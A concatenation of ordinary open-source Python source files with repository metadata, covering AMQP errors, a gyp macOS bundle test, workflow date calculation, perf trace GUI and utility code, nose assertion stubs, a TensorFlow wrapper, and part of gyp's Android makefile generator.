super(AMQPError, self).__init__(*args, **kwargs)
if self._error_code not in AMQP_ERROR_MAPPING:
return
self._error_type = AMQP_ERROR_MAPPING[self._error_code][0]
self._documentation = AMQP_ERROR_MAPPING[self._error_code][1]
class AMQPConnectionError(AMQPError):
"""AMQP Connection Error"""
pass
class AMQPChannelError(AMQPError):
"""AMQP Channel Error"""
pass
class AMQPMessageError(AMQPChannelError):
"""AMQP Message Error"""
pass
class AMQPInvalidArgument(AMQPError):
"""AMQP Argument Error"""
|
mit
|
kawalpemilu/kawalpemilu2014
|
internal-backend/http-server/gyp/test/mac/gyptest-app.py
|
75
|
4193
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that app bundles are built correctly.
"""
import TestGyp
import os
import plistlib
import subprocess
import sys
def GetStdout(cmdlist):
return subprocess.Popen(cmdlist,
stdout=subprocess.PIPE).communicate()[0].rstrip('\n')
def ExpectEq(expected, actual):
if expected != actual:
print >>sys.stderr, 'Expected "%s", got "%s"' % (expected, actual)
test.fail_test()
def ls(path):
'''Returns a list of all files in a directory, relative to the directory.'''
result = []
for dirpath, _, files in os.walk(path):
for f in files:
result.append(os.path.join(dirpath, f)[len(path) + 1:])
return result
def XcodeVersion():
stdout = subprocess.check_output(['xcodebuild', '-version'])
version = stdout.splitlines()[0].split()[-1].replace('.', '')
return (version + '0' * (3 - len(version))).zfill(4)
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test.gyp', chdir='app-bundle')
test.build('test.gyp', test.ALL, chdir='app-bundle')
# Binary
test.built_file_must_exist('Test App Gyp.app/Contents/MacOS/Test App Gyp',
chdir='app-bundle')
# Info.plist
info_plist = test.built_file_path('Test App Gyp.app/Contents/Info.plist',
chdir='app-bundle')
test.must_exist(info_plist)
test.must_contain(info_plist, 'com.google.Test-App-Gyp') # Variable expansion
test.must_not_contain(info_plist, '${MACOSX_DEPLOYMENT_TARGET}');
if test.format != 'make':
# TODO: Synthesized plist entries aren't hooked up in the make generator.
plist = plistlib.readPlist(info_plist)
ExpectEq(GetStdout(['sw_vers', '-buildVersion']),
plist['BuildMachineOSBuild'])
# Prior to Xcode 5.0.0, SDKROOT (and thus DTSDKName) was only defined if
# set in the Xcode project file. Starting with that version, it is always
# defined.
expected = ''
if XcodeVersion() >= '0500':
version = GetStdout(['xcodebuild', '-version', '-sdk', '', 'SDKVersion'])
expected = 'macosx' + version
ExpectEq(expected, plist['DTSDKName'])
sdkbuild = GetStdout(
['xcodebuild', '-version', '-sdk', '', 'ProductBuildVersion'])
if not sdkbuild:
# Above command doesn't work in Xcode 4.2.
sdkbuild = plist['BuildMachineOSBuild']
ExpectEq(sdkbuild, plist['DTSDKBuild'])
xcode, build = GetStdout(['xcodebuild', '-version']).splitlines()
xcode = xcode.split()[-1].replace('.', '')
xcode = (xcode + '0' * (3 - len(xcode))).zfill(4)
build = build.split()[-1]
ExpectEq(xcode, plist['DTXcode'])
ExpectEq(build, plist['DTXcodeBuild'])
# Resources
strings_files = ['InfoPlist.strings', 'utf-16be.strings', 'utf-16le.strings']
for f in strings_files:
strings = test.built_file_path(
os.path.join('Test App Gyp.app/Contents/Resources/English.lproj', f),
chdir='app-bundle')
test.must_exist(strings)
# Xcodes writes UTF-16LE with BOM.
contents = open(strings, 'rb').read()
if not contents.startswith('\xff\xfe' + '/* Localized'.encode('utf-16le')):
test.fail_test()
test.built_file_must_exist(
'Test App Gyp.app/Contents/Resources/English.lproj/MainMenu.nib',
chdir='app-bundle')
# Packaging
test.built_file_must_exist('Test App Gyp.app/Contents/PkgInfo',
chdir='app-bundle')
test.built_file_must_match('Test App Gyp.app/Contents/PkgInfo', 'APPLause',
chdir='app-bundle')
# Check that no other files get added to the bundle.
if set(ls(test.built_file_path('Test App Gyp.app', chdir='app-bundle'))) != \
set(['Contents/MacOS/Test App Gyp',
'Contents/Info.plist',
'Contents/Resources/English.lproj/MainMenu.nib',
'Contents/PkgInfo',
] +
[os.path.join('Contents/Resources/English.lproj', f)
for f in strings_files]):
test.fail_test()
test.pass_test()
|
agpl-3.0
|
hyperNURb/ggrc-core
|
src/ggrc_workflows/services/workflow_cycle_calculator/annually_cycle_calculator.py
|
5
|
2706
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
import datetime
from dateutil import relativedelta
from cycle_calculator import CycleCalculator
class AnnuallyCycleCalculator(CycleCalculator):
"""CycleCalculator implementation for annual workflows.
Month domain is 1-12, date domain is 1-31.
"""
time_delta = relativedelta.relativedelta(years=1)
date_domain = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31}
month_domain = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12}
def __init__(self, workflow, base_date=None):
super(AnnuallyCycleCalculator, self).__init__(workflow)
base_date = self.get_base_date(base_date)
self.reified_tasks = {}
for task in self.tasks:
start_date, end_date = self.non_adjusted_task_date_range(
task, base_date, initialisation=True)
self.reified_tasks[task.id] = {
'start_date': start_date,
'end_date': end_date,
'relative_start': (task.relative_start_month, task.relative_start_day),
'relative_end': (task.relative_end_month, task.relative_end_day)
}
def relative_day_to_date(self, relative_day, relative_month=None,
base_date=None):
"""Converts an annual relative day representation to concrete date object
First we ensure that we have both relative_day and relative_month or,
alternatively, that relative_day carries month information as well.
While task_date_range calls with explicit relative_month, reified_tasks
stores relative days as MM/DD and we must first convert these values so
that it can sort and get min and max values for tasks.
Afterwards we repeat the math similar to monthly cycle calculator and
ensure that the day is not overflowing to the next month.
"""
today = datetime.date.today()
relative_day = int(relative_day)
relative_month = int(relative_month)
if not relative_day in AnnuallyCycleCalculator.date_domain:
raise ValueError
if not relative_month in AnnuallyCycleCalculator.month_domain:
raise ValueError
base_date = self.get_base_date(base_date)
start_month = datetime.date(base_date.year, relative_month, 1)
ddate = start_month + relativedelta.relativedelta(days=relative_day - 1)
# We want to go up to the end of the month and not over
if ddate.month != start_month.month:
ddate = ddate - relativedelta.relativedelta(days=ddate.day)
return ddate
|
apache-2.0
|
MoKee/android_kernel_amazon_otter-common
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py
|
12980
|
5411
|
# SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <[email protected]>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
|
gpl-2.0
|
goodwinnk/intellij-community
|
python/helpers/python-skeletons/nose/tools/__init__.py
|
80
|
5457
|
"""Skeleton for 'nose.tools' module.
Project: nose 1.3 <https://nose.readthedocs.org/>
Skeleton by: Andrey Vlasovskikh <[email protected]>
"""
import sys
def assert_equal(first, second, msg=None):
"""Fail if the two objects are unequal as determined by the '==' operator.
"""
pass
def assert_not_equal(first, second, msg=None):
"""Fail if the two objects are equal as determined by the '==' operator.
"""
pass
def assert_true(expr, msg=None):
"""Check that the expression is true."""
pass
def assert_false(expr, msg=None):
"""Check that the expression is false."""
pass
if sys.version_info >= (2, 7):
def assert_is(expr1, expr2, msg=None):
"""Just like assert_true(a is b), but with a nicer default message."""
pass
def assert_is_not(expr1, expr2, msg=None):
"""Just like assert_true(a is not b), but with a nicer default message.
"""
pass
def assert_is_none(obj, msg=None):
"""Same as assert_true(obj is None), with a nicer default message.
"""
pass
def assert_is_not_none(obj, msg=None):
"""Included for symmetry with assert_is_none."""
pass
def assert_in(member, container, msg=None):
"""Just like assert_true(a in b), but with a nicer default message."""
pass
def assert_not_in(member, container, msg=None):
"""Just like assert_true(a not in b), but with a nicer default message.
"""
pass
def assert_is_instance(obj, cls, msg=None):
"""Same as assert_true(isinstance(obj, cls)), with a nicer default
message.
"""
pass
def assert_not_is_instance(obj, cls, msg=None):
"""Included for symmetry with assert_is_instance."""
pass
def assert_raises(excClass, callableObj=None, *args, **kwargs):
"""Fail unless an exception of class excClass is thrown by callableObj when
invoked with arguments args and keyword arguments kwargs.
If called with callableObj omitted or None, will return a
context object used like this::
with assert_raises(SomeException):
do_something()
:rtype: unittest.case._AssertRaisesContext | None
"""
pass
if sys.version_info >= (2, 7):
def assert_raises_regexp(expected_exception, expected_regexp,
callable_obj=None, *args, **kwargs):
"""Asserts that the message in a raised exception matches a regexp.
:rtype: unittest.case._AssertRaisesContext | None
"""
pass
def assert_almost_equal(first, second, places=None, msg=None, delta=None):
"""Fail if the two objects are unequal as determined by their difference
rounded to the given number of decimal places (default 7) and comparing to
zero, or by comparing that the between the two objects is more than the
given delta.
"""
pass
def assert_not_almost_equal(first, second, places=None, msg=None, delta=None):
"""Fail if the two objects are equal as determined by their difference
rounded to the given number of decimal places (default 7) and comparing to
zero, or by comparing that the between the two objects is less than the
given delta.
"""
pass
if sys.version_info >= (2, 7):
def assert_greater(a, b, msg=None):
"""Just like assert_true(a > b), but with a nicer default message."""
pass
def assert_greater_equal(a, b, msg=None):
"""Just like assert_true(a >= b), but with a nicer default message."""
pass
def assert_less(a, b, msg=None):
"""Just like assert_true(a < b), but with a nicer default message."""
pass
def assert_less_equal(a, b, msg=None):
"""Just like self.assertTrue(a <= b), but with a nicer default
message.
"""
pass
def assert_regexp_matches(text, expected_regexp, msg=None):
"""Fail the test unless the text matches the regular expression."""
pass
def assert_not_regexp_matches(text, unexpected_regexp, msg=None):
"""Fail the test if the text matches the regular expression."""
pass
def assert_items_equal(expected_seq, actual_seq, msg=None):
"""An unordered sequence specific comparison. It asserts that
actual_seq and expected_seq have the same element counts.
"""
pass
def assert_dict_contains_subset(expected, actual, msg=None):
"""Checks whether actual is a superset of expected."""
pass
def assert_multi_line_equal(first, second, msg=None):
"""Assert that two multi-line strings are equal."""
pass
def assert_sequence_equal(seq1, seq2, msg=None, seq_type=None):
"""An equality assertion for ordered sequences (like lists and tuples).
"""
pass
def assert_list_equal(list1, list2, msg=None):
"""A list-specific equality assertion."""
pass
def assert_tuple_equal(tuple1, tuple2, msg=None):
"""A tuple-specific equality assertion."""
pass
def assert_set_equal(set1, set2, msg=None):
"""A set-specific equality assertion."""
pass
def assert_dict_equal(d1, d2, msg=None):
"""A dict-specific equality assertion."""
pass
assert_equals = assert_equal
assert_not_equals = assert_not_equal
assert_almost_equals = assert_almost_equal
assert_not_almost_equals = assert_not_almost_equal
|
apache-2.0
|
Jason-Lam/linux-am335x
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
|
gpl-2.0
|
rabipanda/tensorflow
|
tensorflow/python/training/training_ops.py
|
131
|
1046
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for training ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.training import gen_training_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.training.gen_training_ops import *
# pylint: enable=wildcard-import
|
apache-2.0
|
tacrow/tacrow
|
node_modules/node-gyp/gyp/pylib/gyp/generator/android.py
|
960
|
45344
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Notes:
#
# This generates makefiles suitable for inclusion into the Android build system
# via an Android.mk file. It is based on make.py, the standard makefile
# generator.
#
# The code below generates a separate .mk file for each target, but
# all are sourced by the top-level GypAndroid.mk. This means that all
# variables in .mk-files clobber one another, and furthermore that any
# variables set potentially clash with other Android build system variables.
# Try to avoid setting global variables where possible.
import gyp
import gyp.common
import gyp.generator.make as make # Reuse global functions from make backend.
import os
import re
import subprocess
generator_default_variables = {
'OS': 'android',
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'SHARED_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'SHARED_LIB_SUFFIX': '.so',
'INTERMEDIATE_DIR': '$(gyp_intermediate_dir)',
'SHARED_INTERMEDIATE_DIR': '$(gyp_shared_intermediate_dir)',
'PRODUCT_DIR': '$(gyp_shared_intermediate_dir)',
'SHARED_LIB_DIR': '$(builddir)/lib.$(TOOLSET)',
'LIB_DIR': '$(obj).$(TOOLSET)',
'RULE_INPUT_ROOT': '%(INPUT_ROOT)s', # This gets expanded by Python.
'RULE_INPUT_DIRNAME': '%(INPUT_DIRNAME)s', # This gets expanded by Python.
'RULE_INPUT_PATH': '$(RULE_SOURCES)',
'RULE_INPUT_EXT': '$(suffix $<)',
'RULE_INPUT_NAME': '$(notdir $<)',
'CONFIGURATION_NAME': '$(GYP_CONFIGURATION)',
}
# Make supports multiple toolsets
generator_supports_multiple_toolsets = True
# Generator-specific gyp specs.
generator_additional_non_configuration_keys = [
# Boolean to declare that this target does not want its name mangled.
'android_unmangled_name',
# Map of android build system variables to set.
'aosp_build_settings',
]
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
ALL_MODULES_FOOTER = """\
# "gyp_all_modules" is a concatenation of the "gyp_all_modules" targets from
# all the included sub-makefiles. This is just here to clarify.
gyp_all_modules:
"""
header = """\
# This file is generated by gyp; do not edit.
"""
# Map gyp target types to Android module classes.
MODULE_CLASSES = {
'static_library': 'STATIC_LIBRARIES',
'shared_library': 'SHARED_LIBRARIES',
'executable': 'EXECUTABLES',
}
def IsCPPExtension(ext):
return make.COMPILABLE_EXTENSIONS.get(ext) == 'cxx'
def Sourceify(path):
"""Convert a path to its source directory form. The Android backend does not
support options.generator_output, so this function is a noop."""
return path
# Map from qualified target to path to output.
# For Android, the target of these maps is a tuple ('static', 'modulename'),
# ('dynamic', 'modulename'), or ('path', 'some/path') instead of a string,
# since we link by module.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
class AndroidMkWriter(object):
"""AndroidMkWriter packages up the writing of one target-specific Android.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, android_top_dir):
self.android_top_dir = android_top_dir
def Write(self, qualified_target, relative_target, base_path, output_filename,
spec, configs, part_of_all, write_alias_target, sdk_version):
"""The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
relative_target: qualified target name relative to the root
base_path: path relative to source root we're building in, used to resolve
target-relative paths
output_filename: output .mk file name to write
spec, configs: gyp info
part_of_all: flag indicating this target is part of 'all'
write_alias_target: flag indicating whether to create short aliases for
this target
sdk_version: what to emit for LOCAL_SDK_VERSION in output
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.relative_target = relative_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
self.android_class = MODULE_CLASSES.get(self.type, 'GYP')
self.android_module = self.ComputeAndroidModule(spec)
(self.android_stem, self.android_suffix) = self.ComputeOutputParts(spec)
self.output = self.output_binary = self.ComputeOutput(spec)
# Standard header.
self.WriteLn('include $(CLEAR_VARS)\n')
# Module class and name.
self.WriteLn('LOCAL_MODULE_CLASS := ' + self.android_class)
self.WriteLn('LOCAL_MODULE := ' + self.android_module)
# Only emit LOCAL_MODULE_STEM if it's different to LOCAL_MODULE.
# The library module classes fail if the stem is set. ComputeOutputParts
# makes sure that stem == modulename in these cases.
if self.android_stem != self.android_module:
self.WriteLn('LOCAL_MODULE_STEM := ' + self.android_stem)
self.WriteLn('LOCAL_MODULE_SUFFIX := ' + self.android_suffix)
if self.toolset == 'host':
self.WriteLn('LOCAL_IS_HOST_MODULE := true')
self.WriteLn('LOCAL_MULTILIB := $(GYP_HOST_MULTILIB)')
elif sdk_version > 0:
self.WriteLn('LOCAL_MODULE_TARGET_ARCH := '
'$(TARGET_$(GYP_VAR_PREFIX)ARCH)')
self.WriteLn('LOCAL_SDK_VERSION := %s' % sdk_version)
# Grab output directories; needed for Actions and Rules.
if self.toolset == 'host':
self.WriteLn('gyp_intermediate_dir := '
'$(call local-intermediates-dir,,$(GYP_HOST_VAR_PREFIX))')
else:
self.WriteLn('gyp_intermediate_dir := '
'$(call local-intermediates-dir,,$(GYP_VAR_PREFIX))')
self.WriteLn('gyp_shared_intermediate_dir := '
'$(call intermediates-dir-for,GYP,shared,,,$(GYP_VAR_PREFIX))')
self.WriteLn()
# List files this target depends on so that actions/rules/copies/sources
# can depend on the list.
# TODO: doesn't pull in things through transitive link deps; needed?
target_dependencies = [x[1] for x in deps if x[0] == 'path']
self.WriteLn('# Make sure our deps are built first.')
self.WriteList(target_dependencies, 'GYP_TARGET_DEPENDENCIES',
local_pathify=True)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs)
# GYP generated outputs.
self.WriteList(extra_outputs, 'GYP_GENERATED_OUTPUTS', local_pathify=True)
# Set LOCAL_ADDITIONAL_DEPENDENCIES so that Android's build rules depend
# on both our dependency targets and our generated files.
self.WriteLn('# Make sure our deps and generated files are built first.')
self.WriteLn('LOCAL_ADDITIONAL_DEPENDENCIES := $(GYP_TARGET_DEPENDENCIES) '
'$(GYP_GENERATED_OUTPUTS)')
self.WriteLn()
# Sources.
if spec.get('sources', []) or extra_sources:
self.WriteSources(spec, configs, extra_sources)
self.WriteTarget(spec, configs, deps, link_deps, part_of_all,
write_alias_target)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = ('path', self.output_binary)
# Update global list of link dependencies.
if self.type == 'static_library':
target_link_deps[qualified_target] = ('static', self.android_module)
elif self.type == 'shared_library':
target_link_deps[qualified_target] = ('shared', self.android_module)
self.fp.close()
return self.android_module
def WriteActions(self, actions, extra_sources, extra_outputs):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
"""
for action in actions:
name = make.StringToMakefileVariable('%s_%s' % (self.relative_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
if not out.startswith('$'):
print ('WARNING: Action for target "%s" writes output to local path '
'"%s".' % (self.target, out))
dir = os.path.split(out)[0]
if dir:
dirs.add(dir)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
# Prepare the actual command.
command = gyp.common.EncodePOSIXShellList(action['action'])
if 'message' in action:
quiet_cmd = 'Gyp action: %s ($@)' % action['message']
else:
quiet_cmd = 'Gyp action: %s ($@)' % name
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd $(gyp_local_path)/%s; ' % self.path
command = cd_action + command
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the gyp_*
# variables for the action rule with an absolute version so that the
# output goes in the right place.
# Only write the gyp_* rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
main_output = make.QuoteSpaces(self.LocalPathify(outputs[0]))
self.WriteLn('%s: gyp_local_path := $(LOCAL_PATH)' % main_output)
self.WriteLn('%s: gyp_var_prefix := $(GYP_VAR_PREFIX)' % main_output)
self.WriteLn('%s: gyp_intermediate_dir := '
'$(abspath $(gyp_intermediate_dir))' % main_output)
self.WriteLn('%s: gyp_shared_intermediate_dir := '
'$(abspath $(gyp_shared_intermediate_dir))' % main_output)
# Android's envsetup.sh adds a number of directories to the path including
# the built host binary directory. This causes actions/rules invoked by
# gyp to sometimes use these instead of system versions, e.g. bison.
# The built host binaries may not be suitable, and can cause errors.
# So, we remove them from the PATH using the ANDROID_BUILD_PATHS variable
# set by envsetup.
self.WriteLn('%s: export PATH := $(subst $(ANDROID_BUILD_PATHS),,$(PATH))'
% main_output)
# Don't allow spaces in input/output filenames, but make an exception for
# filenames which start with '$(' since it's okay for there to be spaces
# inside of make function/macro invocations.
for input in inputs:
if not input.startswith('$(') and ' ' in input:
raise gyp.common.GypError(
'Action input filename "%s" in target %s contains a space' %
(input, self.target))
for output in outputs:
if not output.startswith('$(') and ' ' in output:
raise gyp.common.GypError(
'Action output filename "%s" in target %s contains a space' %
(output, self.target))
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES)' %
(main_output, ' '.join(map(self.LocalPathify, inputs))))
self.WriteLn('\t@echo "%s"' % quiet_cmd)
self.WriteLn('\t$(hide)%s\n' % command)
for output in outputs[1:]:
# Make each output depend on the main output, with an empty command
# to force make to notice that the mtime has changed.
self.WriteLn('%s: %s ;' % (self.LocalPathify(output), main_output))
extra_outputs += outputs
self.WriteLn()
self.WriteLn()
def WriteRules(self, rules, extra_sources, extra_outputs):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
"""
if len(rules) == 0:
return
for rule in rules:
if len(rule.get('rule_sources', [])) == 0:
continue
name = make.StringToMakefileVariable('%s_%s' % (self.relative_target,
rule['rule_name']))
self.WriteLn('\n### Generated for rule "%s":' % name)
self.WriteLn('# "%s":' % rule)
inputs = rule.get('inputs')
for rule_source in rule.get('rule_sources', []):
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = \
os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
dirs = set()
for out in outputs:
if not out.startswith('$'):
print ('WARNING: Rule for target %s writes output to local path %s'
% (self.target, out))
dir = os.path.dirname(out)
if dir:
dirs.add(dir)
